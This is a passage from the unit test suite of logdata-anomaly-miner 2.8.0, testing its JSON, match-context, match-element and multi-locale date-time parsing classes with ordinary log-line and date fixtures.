optional_key_prefix="+", nullable_key_prefix="+") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/JsonStringModelElementTest.py000066400000000000000000000235461500476301700312420ustar00rootroot00000000000000import copy import unittest import json from aminer.parsing.JsonStringModelElement import JsonStringModelElement, JsonAccessObject from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalFloatValueModelElement 
import DecimalFloatValueModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class JsonStringModelElementTest(TestBase): """Unittests for the JsonStringModelElement.""" id_ = "json" path = "path" strict = False ignore_null = True def test1get_id(self): """Test if get_id works properly.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } json_me = JsonStringModelElement(self.id_, key_parser_dict, self.strict, self.ignore_null) self.assertEqual(json_me.get_id(), self.id_) def test2get_match_element_valid_match(self): """Parses a json-file and compares if the configured ModelElements are parsed properly.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } json_model_element = JsonStringModelElement(self.id_, key_parser_dict, self.strict, self.ignore_null) data = b'{"host": "www.google.com", "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(2, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"foobar", match_element.children[1].get_match_object()) def test3strict_mode(self): """Parses a json-file and compares if the configured ModelElements are parsed properly with strict_mode.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") path = DummyFixedDataModelElement("path", b"/index.html") key_parser_dict = { "host": { "server": host }, "user": user } # Sets strict_mode to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, self.ignore_null) # "one": "two" is too much data = b'{"host": 
{"server": "www.google.com"}, "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(None,match_element) # Sets one more element key_parser_dict = { "host": { "server": host }, "user": user, "path": path } # Sets strict_mode to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True) # "one": "two" is too much data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(None,match_element) # Sets the logdata to the exact configuration-json. data = b'{"host": {"server": "www.google.com"}, "user": "foobar", "path": "/index.html"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.assertEqual(3,len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"foobar", match_element.children[1].get_match_object()) self.assertEqual(b"/index.html", match_element.children[2].get_match_object()) def test4ignore_null(self): """Parses a json-file with ignore_null and compares if the configured ModelElements are parsed properly.""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } # Set ignore_null to True and strict to False json_model_element = JsonStringModelElement(self.id_, key_parser_dict, False, True) # Set user to null data = b'{"host": "www.google.com", "user": null, "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed but without "user": self.assertEqual(1, len(match_element.children)) self.assertEqual(b"www.google.com", 
match_element.children[0].get_match_object()) # set ignore_null to False and strict to False json_model_element = JsonStringModelElement(self.id_, key_parser_dict, False, False) # Set user to null data = b'{"host": "www.google.com", "user": null, "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # expect an unparsed line self.assertEqual(None,match_element) # set example user to empty string user = DummyFixedDataModelElement("user", b"") key_parser_dict2 = { "host": host, "user": user } # Set ignore_null to False in order to pass b"" to the subparser. Strict is False json_model_element = JsonStringModelElement(self.id_, key_parser_dict2, False, False) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed: self.assertEqual(2, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"", match_element.children[1].get_match_object()) # Set ignore_null to True and strict to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, True) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed but without "user": self.assertEqual(1, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) # set ignore_null to False and strict to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, False) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # expect an unparsed line 
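# continuation of JsonStringModelElementTest.test4ignore_null (ignore_null=False, strict=True)
        self.assertEqual(None, match_element)
        # set example user to empty string
        user = DummyFixedDataModelElement("user", b"")
        key_parser_dict2 = {"host": host, "user": user}
        # Set ignore_null to False in order to pass b"" to the subparser. Strict is True
        json_model_element = JsonStringModelElement(self.id_, key_parser_dict2, True, False)
        # Set user to null
        data = b'{"host": "www.google.com", "user": null}'
        match_context = DummyMatchContext(data)
        match_element = json_model_element.get_match_element(self.path, match_context)
        # Line must be parsed:
        self.assertEqual(2, len(match_element.children))
        self.assertEqual(b"www.google.com", match_element.children[0].get_match_object())
        self.assertEqual(b"", match_element.children[1].get_match_object())


class JsonAccessObjectTest(TestBase):
    """Unittests for the JsonAccessObject used by the JsonStringModelElement."""

    def test1get_id(self):
        """Flatten a nested dictionary and check that every leaf is reachable under its dotted/indexed key."""
        d = {
            "a": "b",
            "c": {
                "w": "g",
                "rata": "mahatta",
                "tic": {"tac": "toe"},
                "brat": ["worst", "wuast", {"key": ["wurst", "fleisch"], "food": "veggie"}, "blues"],
                "bist": "narrisch"
            },
            "foo": "bar"
        }
        # Expected flattened view of d, one entry per leaf value. The original test listed these in a
        # bare string literal (a no-op statement) and never checked the value stored under "c.bist".
        expected = {
            "a": "b",
            "c.w": "g",
            "c.rata": "mahatta",
            "c.tic.tac": "toe",
            "c.brat[0]": "worst",
            "c.brat[1]": "wuast",
            "c.brat[2].key[0]": "wurst",
            "c.brat[2].key[1]": "fleisch",
            "c.brat[2].food": "veggie",
            "c.brat[3]": "blues",
            "c.bist": "narrisch",
            "foo": "bar"
        }
        jao = JsonAccessObject(d)
        # exactly the 12 leaves above, nothing more
        self.assertEqual(len(expected), len(jao.collection))
        for key, value in expected.items():
            with self.subTest(key=key):
                self.assertIn(key, jao.collection)
                self.assertTrue(jao.collection[key])
                self.assertEqual(value, jao.collection[key]["value"])
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/MatchContextTest.py000066400000000000000000000121101500476301700272350ustar00rootroot00000000000000
import unittest
from aminer.parsing.MatchContext import MatchContext, DebugMatchContext
from unit.TestBase import TestBase


class MatchContextTest(TestBase):
    """Unittests for the MatchContext and DebugMatchContext."""

    # values that neither MatchContext nor DebugMatchContext accept as constructor input
    INVALID_INIT_VALUES = (None, "path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set())

    def test1update_successful(self):
        """Update the MatchContext and DebugMatchContext with allowed values."""
        data = b"this is an example of a log line."
        match_context = MatchContext(data)
        match_context.update(b"this is an example")
        self.assertEqual(match_context.match_data, b" of a log line.")

        # a list of byte strings is accepted by the plain MatchContext; only its length matters
        match_context = MatchContext(data)
        match_context.update([b"t", b"h", b"i", b"s"])
        self.assertEqual(match_context.match_data, b" is an example of a log line.")

        # the plain MatchContext does not compare content, it only consumes len(match_string) bytes
        match_context = MatchContext(data)
        match_context.update(b"some other text")
        self.assertEqual(match_context.match_data, b"ple of a log line.")

        # the DebugMatchContext additionally records what was removed and what remains
        match_context = DebugMatchContext(data)
        match_context.update(b"this is an example ")
        self.assertEqual(match_context.match_data, b"of a log line.")
        self.assertEqual(match_context.get_debug_info(),
                         'Starting match update on "this is an example of a log line."\n Removed: "this is an example ", remaining 14'
                         ' bytes\n Shortest unmatched data: "of a log line."\n')
        # a second call only reports the remaining data
        self.assertEqual(match_context.get_debug_info(), ' Shortest unmatched data: "of a log line."\n')
        match_context.update(b"of")
        self.assertEqual(match_context.get_debug_info(),
                         ' Removed: "of", remaining 12 bytes\n Shortest unmatched data: " a log line."\n')
        match_context.update(b" a log line.")
        self.assertEqual(match_context.get_debug_info(),
                         ' Removed: " a log line.", remaining 0 bytes\n Shortest unmatched data: ""\n')
        # nothing is left, so the same update must now be rejected
        self.assertRaises(ValueError, match_context.update, b" a log line.")
        self.assertEqual(match_context.get_debug_info(),
                         ' Current data does not start with " a log line."\n Shortest unmatched data: ""\n')
        match_context.update(b"")

    def test2update_fail(self):
        """Update the DebugMatchContext with not allowed values."""
        match_context = DebugMatchContext(b"this is an example of a log line.")
        self.assertRaises(TypeError, match_context.update, "this is an example")
        self.assertRaises(TypeError, match_context.update, [b"t", b"h", b"i", b"s"])
        self.assertRaises(ValueError, match_context.update, b"some other text")

    def test3_match_context_init_input_validation(self):
        """Check if input is validated for MatchContext.__init__()."""
        for invalid in self.INVALID_INIT_VALUES:
            with self.subTest(value=invalid):
                self.assertRaises(TypeError, MatchContext, invalid)

    def test4_match_context_update_input_validation(self):
        """Check if MatchContext.update() fails if len(match_string) does not work."""
        data = b"this is an example of a log line."
        match_context = MatchContext(data)
        for invalid in (None, True, 123, 123.22, match_context):
            with self.subTest(value=invalid):
                self.assertRaises(TypeError, match_context.update, invalid)

    def test5_debug_match_context_init_input_validation(self):
        """Check if input is validated for DebugMatchContext.__init__()."""
        for invalid in self.INVALID_INIT_VALUES:
            with self.subTest(value=invalid):
                self.assertRaises(TypeError, DebugMatchContext, invalid)

    def test6_debug_match_context_update_input_validation(self):
        """Check if input is validated for DebugMatchContext.update()."""
        data = b"this is an example of a log line."
        # DebugMatchContext is the class under test here (see the test name and docstring); the original
        # constructed a plain MatchContext, so DebugMatchContext.update() was never exercised by this test.
        match_context = DebugMatchContext(data)
        for invalid in (None, True, 123, 123.22):
            with self.subTest(value=invalid):
                self.assertRaises(TypeError, match_context.update, invalid)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/MatchElementTest.py000066400000000000000000000227601500476301700272100ustar00rootroot00000000000000
import unittest
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase


class MatchElementTest(TestBase):
    """Unittests for the MatchElement."""

    path = "path"
    match_string = b"12.5"
    match_object = 12.5

    def test1get_path(self):
        """Test if get_path returns the path passed to the constructor."""
        match_element = MatchElement(self.path, self.match_string, self.match_object, None)
        self.assertEqual(match_element.get_path(), self.path)

    def test2get_match_string(self):
        """Test if get_match_string returns the match string passed to the constructor."""
        match_element = MatchElement(self.path, self.match_string, self.match_object, None)
        self.assertEqual(match_element.get_match_string(), self.match_string)

    def test3get_match_object(self):
        """Test if get_match_object returns the match object passed to the constructor."""
        match_element = MatchElement(self.path, self.match_string, self.match_object, None)
        self.assertEqual(match_element.get_match_object(), self.match_object)

    def test4get_children(self):
        """Test if get_children returns None when the element was created without children."""
        match_element = MatchElement(self.path, self.match_string, self.match_object, None)
        self.assertEqual(match_element.get_children(), None)

    def test5annotate_match(self):
        """This test case checks if all possible annotations are created correctly."""
        # two three-level chains (a1 > a2 > a3, b1 > b2 > b3) under one root element
        a3 = MatchElement("a3", b"a3", b"a3", None)
        a2 = MatchElement("a2", b"a2", b"a2", [a3])
        a1 = MatchElement("a1", b"a1", b"a1", [a2])
        b3 = MatchElement("b3", b"b3", b"b3", None)
        b2 = MatchElement("b2", b"b2", b"b2", [b3])
        b1 = MatchElement("b1", b"b1", b"b1", [b2])
        root_element = MatchElement("root", b"root",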
b"root", [a1, b1]) self.assertEqual(root_element.annotate_match(None), "root: root a1: a1 a2: a2 a3: a3 b1: b1 b2: b2 b3: b3") self.assertEqual(root_element.annotate_match(""), "root: root\n a1: a1\n a2: a2\n a3: a3\n b1: b1\n b2: b2\n " "b3: b3") self.assertEqual(root_element.annotate_match("--"), "--root: root\n-- a1: a1\n-- a2: a2\n-- a3: a3\n-- b1: b1\n" "-- b2: b2\n-- b3: b3") def test6serialize_object(self): """This test case checks if all child objects are serialized correctly.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) self.assertEqual(root_element.serialize_object(), {"path": "root", "match_object": b"root", "match_string": b"root", "children": [ {"path": "a1", "match_object": b"a1", "match_string": b"a1", "children": [ {"path": "a2", "match_object": b"a2", "match_string": b"a2", "children": [{"path": "a3", "match_object": b"a3", "match_string": b"a3", "children": []}]}]}, {"path": "b1", "match_object": b"b1", "match_string": b"b1", "children": [ {"path": "b2", "match_object": b"b2", "match_string": b"b2", "children": [{"path": "b3", "match_object": b"b3", "match_string": b"b3", "children": []}]}]}]}) def test7str(self): """Test the string representation of the MatchElements.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) self.assertEqual(root_element.__str__(), "MatchElement: path = root, string = root, object = root, children = 2") root_element = MatchElement("match", b"string", 2, None) 
self.assertEqual(root_element.__str__(), "MatchElement: path = match, string = string, object = 2, children = 0") def test8init_path_input_validation(self): """Check if path is validated in __init__().""" self.assertRaises(TypeError, MatchElement, b"path", self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, True, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, 123, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, 123.22, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, {"id": "path"}, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, ["path"], self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, [], self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, (), self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, set(), self.match_string, self.match_object, None) def test9init_match_string_input_validation(self): """Check if match_string is validated in __init__().""" self.assertRaises(TypeError, MatchElement, self.path, "path", self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, True, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, 123, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, 123.22, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, {"id": "path"}, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, ["path"], self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, [], self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, (), self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, set(), self.match_object, None) def test10init_match_object_input_validation(self): 
"""Check if match_object is validated in __init__().""" MatchElement(self.path, self.match_string, b"", None) MatchElement(self.path, self.match_string, "path", None) MatchElement(self.path, self.match_string, True, None) MatchElement(self.path, self.match_string, 123, None) MatchElement(self.path, self.match_string, 123.22, None) MatchElement(self.path, self.match_string, {"id": "path"}, None) MatchElement(self.path, self.match_string, ["path"], None) MatchElement(self.path, self.match_string, [], None) MatchElement(self.path, self.match_string, (), None) MatchElement(self.path, self.match_string, set(), None) MatchElement(self.path, self.match_string, MatchElement(self.path, self.match_string, self.match_object, None), None) def test11init_children_input_validation(self): """Check if children is validated in __init__().""" self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, b"path") self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, "path") self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, True) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, 123) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, 123.22) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, {"id": "path"}) self.assertRaises(ValueError, MatchElement, self.path, self.match_string, self.match_object, []) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, ()) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, set()) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, ["string"]) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, [b"string"]) def test12init_child_elements_with_no_path(self): """This 
test case checks, whether an exception is raised, when the path is None and children are passed.""" self.assertRaises(ValueError, MatchElement, None, self.match_string, self.match_object, [ MatchElement(self.path, self.match_string, self.match_object, None)]) def test13annotate_match_indent_str_input_validation(self): """Check if indent_str is validated in annotate_match().""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertRaises(TypeError, match_element.annotate_match, b" ") self.assertRaises(TypeError, match_element.annotate_match, [" ", "-"]) self.assertRaises(TypeError, match_element.annotate_match, 123.22) self.assertRaises(TypeError, match_element.annotate_match, {"id": "path"}) self.assertRaises(TypeError, match_element.annotate_match, ["path"]) self.assertRaises(TypeError, match_element.annotate_match, []) self.assertRaises(TypeError, match_element.annotate_match, ()) self.assertRaises(TypeError, match_element.annotate_match, set()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/MultiLocaleDateTimeModelElementTest.py000066400000000000000000001217571500476301700327740ustar00rootroot00000000000000import unittest import locale import pytz import logging from io import StringIO from pwd import getpwnam from grp import getgrnam from datetime import datetime, timezone from aminer.parsing.DateTimeModelElement import MultiLocaleDateTimeModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, initialize_loggers class MultiLocaleDateTimeModelElementTest(TestBase): """ Unittests for the MultiLocaleDateTimeModelElement. To calculate the expected timestamps the timezone shift was added or subtracted from the date and the epoch was calculated on https://www.epochconverter.com/. 
For example the date 24.03.2018 11:40:00 CET was converted to 24.03.2018 10:40:00 UTC and then the epoch in seconds was calculated (1521888000). """ id_ = "dtme" path = "path" def test1get_match_element_with_different_date_formats(self): """Test if different date_formats can be used to match data.""" tz_gmt10 = pytz.timezone("Etc/GMT+10") en_gb_utf8 = "en_GB.utf8" en_us_utf8 = "en_US.utf8" de_at_utf8 = "de_AT.utf8" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)], start_year=2021) # test normal date data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_+"/format1", self.path, date, 1549539600, None) # test leap year date data = b"29.02.2020 11:40:00: it still works" date = b"29.02.2020 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format1", self.path, date, 1582976400, None) # test normal date with T data = b"07.02.2019T11:40:00: it still works" date = b"07.02.2019T11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format3", self.path, date, 1549539600, None) # test normal date with fractions data 
= b"07.02.2019 11:40:00.123456: it still works" date = b"07.02.2019 11:40:00.123456" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600.123456, None) # test normal date with z data = b"07.02.2019 11:40:00+0000: it still works" date = b"07.02.2019 11:40:00+0000" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format1", self.path, date, 1549539600, None) # test with only date defined data = b"07.02.2019: it still works" date = b"07.02.2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format4", self.path, date, 1549497600, None) data = b"Feb 25 something happened" date = b"Feb 25" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(2021, 2, 25, tzinfo=tz_gmt10) # total_seconds should be in UTC, so the timezones are parsed out. 
total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=tz_gmt10)).days * 86400 - dtm.utcoffset().total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format7", self.path, date, total_seconds, None) # British date data = b"13 Apr 2019 something happened" date = b"13 Apr 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format8", self.path, date, 1555113600, None) # British date 2 data = b"13th Apr 2019 something happened" date = b"13th Apr 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format9", self.path, date, 1555113600, None) # British date 3 data = b"13/04/2019 something happened" date = b"13/04/2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format10", self.path, date, 1555113600, None) # US date data = b"04-13-2019 something happened" date = b"04-13-2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format11", self.path, date, 1555113600, None) # Austrian date no year - year should already be learnt. # start year has to be 2021, because all other formats have defined years. data = b"13.04. 15:12:54:201 something happened" date = b"13.04. 
15:12:54:201" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format12", self.path, date, 1618326774.201, None) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)]) multi_locale_dtme.latest_parsed_timestamp = None # Austrian time no date data = b"15:12:54:201 something happened" date = b"15:12:54:201" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, datetime.now().month, datetime.now().day, 15, 12, 54, 201, tzinfo=timezone.utc) # total_seconds should be in UTC, so the timezones are parsed out. delta = (dtm - datetime(1970, 1, 1, tzinfo=dtm.tzinfo)) total_seconds = delta.days * 86400 + delta.seconds + delta.microseconds / 1000 self.compare_match_results(data, match_element, match_context, self.id_ + "/format5", self.path, date, total_seconds, None) # test with only time defined. Here obviously the seconds can not be tested. 
data = b"11:40:23: it still works" date = b"11:40:23" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results( data, match_element, match_context, self.id_ + "/format6", self.path, date, match_element.match_object, None) def test2wrong_date(self): """Test if wrong input data does not return a match.""" tz_gmt10 = pytz.timezone("Etc/GMT+10") en_gb_utf8 = "en_GB.utf8" en_us_utf8 = "en_US.utf8" de_at_utf8 = "de_AT.utf8" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)]) # wrong day data = b"32.03.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong month data = b"01.13.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong year data = b"01.01.00 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong date leap year data = b"29.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, 
match_context) # British date data = b"13 Dezember 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_unclean_format_string(self): """This test case checks if unclean format_strings can be used.""" data = b"Date %d: 07.02.2018 11:40:00 UTC+0000: it still works" date = b"Date %d: 07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"Date %%d: %d.%m.%Y %H:%M:%S%z", None, None)]) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518003600, None) def test4get_match_element_with_different_time_zones(self): """Test if different time_zones work with the MultiLocaleDateTimeModelElement.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S%z", None, None)]) data = b"07.02.2018 11:40:00 UTC-1200: it still works" date = b"07.02.2018 11:40:00 UTC-1200" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-12: it still works" date = b"07.02.2018 11:40:00 UTC-12" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-5: it still works" date = b"07.02.2018 11:40:00 UTC-5" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, 
match_context, self.id_ + "/format0", self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC-0500: it still works" date = b"07.02.2018 11:40:00 UTC-0500" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC+0000: it still works" date = b"07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518003600, None) data = b"07.02.2018 11:40:00 UTC+0100: it still works" date = b"07.02.2018 11:40:00 UTC+0100" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00 UTC+1400: it still works" date = b"07.02.2018 11:40:00 UTC+1400" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1517953200, None) def test5get_match_element_with_different_text_locales(self): """Test if data with different text locales can be handled with different text_locale parameters.""" MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "de_AT.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "de_AT.ISO-8859-1")]) def test6text_locale_not_installed(self): """Check if an exception is raised when the text_locale is not installed on the system.""" 
